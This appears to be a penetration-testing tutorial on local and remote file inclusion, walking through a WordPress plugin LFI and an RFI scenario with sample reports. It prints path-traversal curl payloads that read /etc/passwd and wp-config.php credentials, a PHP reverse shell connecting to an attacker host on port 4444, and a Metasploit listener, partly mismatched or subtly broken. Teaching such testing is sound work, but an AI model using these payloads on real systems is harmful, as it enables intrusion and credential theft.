Skip to content

File Inclusion Penetration Testing

A local file inclusion attack is like a guest at a party discovering an unlocked door to the host's private study. Once inside, they rummage through personal files and sensitive documents, taking advantage of the unlocked door to access information not meant for them.

fileInclusion-chacho

File inclusion vulnerabilities occur when a web application allows users to include files without proper validation. There are two types of file inclusion vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI).

  • Local File Inclusion (LFI): This vulnerability occurs when an attacker can include files that are already present on the server. It is typically exploited to read sensitive files such as configuration files, password files, and logs, which may contain valuable information.
  • Remote File Inclusion (RFI): This vulnerability occurs when an attacker can include files from remote servers. This can be used to execute malicious code hosted on an external server, potentially leading to a complete server compromise. RFI is often used when attackers do not have other means of access to the target server.

File inclusion vulnerabilities can be used for various purposes, including information disclosure, code execution, and privilege escalation.

Scenario: LFI

You have been tasked with pentesting a WordPress-based web application. Your goal is to identify any vulnerabilities and demonstrate how any findings could be exploited.

Step 1: Identifying Vulnerability

1. Reconnaissance and Enumeration

  • Use nmap, a network scanning tool, to perform a basic scan of the target: 
    nmap -sV -p 80,443 targetsite.com
  • This step is important to identify open ports and services running on the target server.
  • You discover that the application is hosted on a Linux server running Apache with WordPress.
  • Use WPScan, a WordPress vulnerability scanner, to identify plugins and potential vulnerabilities: 
    wpscan --url http://targetsite.com --enumerate p
  • Identify that the "WP Vault" plugin version 0.8.6.6 is installed.

2. Searching for Known Vulnerabilities

  • Use searchsploit, a tool for searching exploits, to check for known vulnerabilities in the identified plugin: 
    searchsploit wp vault 0.8.6.6
  • Find that there is a known Local File Inclusion vulnerability in the WP Vault plugin version 0.8.6.6.

Step 2: Exploiting the File Inclusion Vulnerability

1. Analyzing the Vulnerability

  • The vulnerability allows for local files to be included through a specific parameter in the URL. This can be used to read sensitive files on the server.

2. Testing the Vulnerability

  • Use a browser or curl to test the LFI vulnerability by attempting to read the /etc/passwd file, which contains user account information: 
    curl "http://targetsite.com/wp-content/plugins/wp-vault/vault.php?file=../../../../../../etc/passwd"
  • This step verifies whether the application is vulnerable to LFI. (Note: You can find exactly how many ../ are necessary by adding them or subtracting them one-by-one to see when the /etc/passwd file starts/stops showing up. This helps identify the exact location of the website in the host's file structure)

3. Reading Sensitive Files

  • If the initial test is successful, read other sensitive files to gather more information. For example, read the WordPress configuration file to obtain database credentials: 
    curl "http://targetsite.com/wp-content/plugins/wp-vault/vault.php?file=../../../../../../wp-config.php"

4. Exploring Further Exploitation

  • Depending on the server configuration and the information obtained, consider further exploitation possibilities such as privilege escalation or remote code execution.

Step 3: Reporting the Findings

1. Document the Process

  • Record each step taken during the testing process, including the commands used and the responses from the server.

2. Create the Pentest Report

Local File Inclusion Vulnerability in WP Vault Plugin 0.8.6.6

1. Introduction

  • During a penetration test of the targetsite.com web application, a Local File Inclusion (LFI) vulnerability was identified in the WP Vault plugin version 0.8.6.6. This vulnerability allows attackers to read local files on the server.

2. Vulnerability Details

  • Endpoint: http://targetsite.com/wp-content/plugins/wp-vault/vault.php
  • Description: The WP Vault plugin version 0.8.6.6 allows for the inclusion of local files through the file parameter without proper validation.

3. Steps to Reproduce

  • Use a browser or curl to test the LFI vulnerability by attempting to read the /etc/passwd file: 
    curl "http://targetsite.com/wp-content/plugins/wp-vault/vault.php?file=../../../../../../etc/passwd"
  • Read the WordPress configuration file to obtain database credentials: 
    curl "http://targetsite.com/wp-content/plugins/wp-vault/vault.php?file=../../../../../../wp-config.php"

4. Impact

  • Successful exploitation allows remote attackers to read sensitive files on the server, potentially leading to further exploitation, such as privilege escalation or remote code execution.

5. Recommendations

  • Update the WP Vault plugin to the latest version that addresses this vulnerability.
  • Implement input validation and sanitization to prevent file inclusion attacks.
  • Restrict access to sensitive files and directories.

6. Conclusion

  • Summary of the findings and the importance of addressing the identified vulnerability to enhance the security posture of the web application.

Scenario: RFI

You have been tasked with pentesting a web application called "VulnApp" that allows users to include remote files through a URL parameter. Your goal is to identify and exploit an RFI vulnerability.

Step 1: Identifying Potential RFI Vulnerability

1. Reconnaissance and Enumeration

  • Use nmap, a network scanning tool, to perform a basic scan of the target:
  • In this instance, we know the website is up and presumably running on port 80 and/or 443 so we can narrow our scan and reduce our noise and scan time by simply focusing on finding out what services are running on those specific ports. 
    nmap -sV -p 80,443 vulnapp.com
  • Discover that the application is hosted on a Linux server running Apache.
  • Use a web vulnerability scanner like Nikto to identify potential issues: 
    nikto -h http://vulnapp.com
  • Identify a parameter that includes files, such as http://vulnapp.com/include.php?file=example.txt.

2. Testing for RFI

  • Use a browser or curl to test the RFI vulnerability by including a remote file hosted on your server: 
    curl "http://vulnapp.com/include.php?file=http://yourserver.com/malicious.txt"
  • This step verifies whether the application is vulnerable to RFI.

Step 2: Exploiting the RFI Vulnerability

1. Setting Up a Remote Server

  • Set up a remote server to host your malicious file. You can use a simple HTTP server with Python: 
    python3 -m http.server 8080
  • Create a PHP file (malicious.php) on your server that will establish a reverse shell: 
    <?php
$sock=fsockopen("your_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");
?>

2. Including the Malicious File

  • Use the vulnerable parameter to include the malicious file from your server: 
    curl "http://vulnapp.com/include.php?file=http://yourserver.com/malicious.php"

Step 3: Setting Up a Listener

1. Setting Up a Listener

  • Set up a listener on your machine to catch the reverse shell using Metasploit, a penetration testing framework: 
    msfconsole
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST your_ip
set LPORT 4444
exploit
  • This step is crucial to listen for incoming connections from the exploited server.

2. Triggering the Payload

  • When the malicious file is included and executed, the reverse shell connects back to your listener, providing remote access to the server.

Step 4: Exploitation and Further Actions

1. Gaining Access:

  • Once you have a shell, explore the server for sensitive information, user credentials, and other vulnerabilities.
  • Consider using post-exploitation modules in Metasploit to escalate privileges and maintain access.

Step 5: Reporting the Findings

1. Document the Process

  • Record each step taken during the testing process, including the commands used and the responses from the server.

2. Create the Pentest Report

Remote File Inclusion Vulnerability in VulnApp

1. Introduction

  • During a penetration test of the VulnApp web application, a Remote File Inclusion (RFI) vulnerability was identified. This vulnerability allows attackers to include and execute files from remote servers.

2. Vulnerability Details

  • Endpoint: http://vulnapp.com/include.php
  • Description: The application allows for the inclusion of remote files through the file parameter without proper validation.

3. Steps to Reproduce

  • Use a browser or curl to test the RFI vulnerability by including a remote file: 
    curl "http://vulnapp.com/include.php?file=http://yourserver.com/malicious.php"

4. Exploitation

  • Set up a remote server to host the malicious file.
  • Include the malicious file using the vulnerable parameter.
  • Set up a listener to catch the reverse shell connection.

5. Impact

  • Successful exploitation allows remote attackers to execute arbitrary code on the server, potentially leading to full system compromise.

6. Recommendations

  • Implement input validation and sanitization to prevent file inclusion attacks.
  • Restrict the inclusion of remote files through URL parameters.
  • Regularly update and patch the application to fix known vulnerabilities.

7. Conclusion

  • Summary of the findings and the importance of addressing the identified vulnerability to enhance the security posture of the web application.

This walkthrough provides a detailed, real-world scenario for identifying and exploiting Remote File Inclusion vulnerabilities in a web application, along with a sample report to present the findings professionally.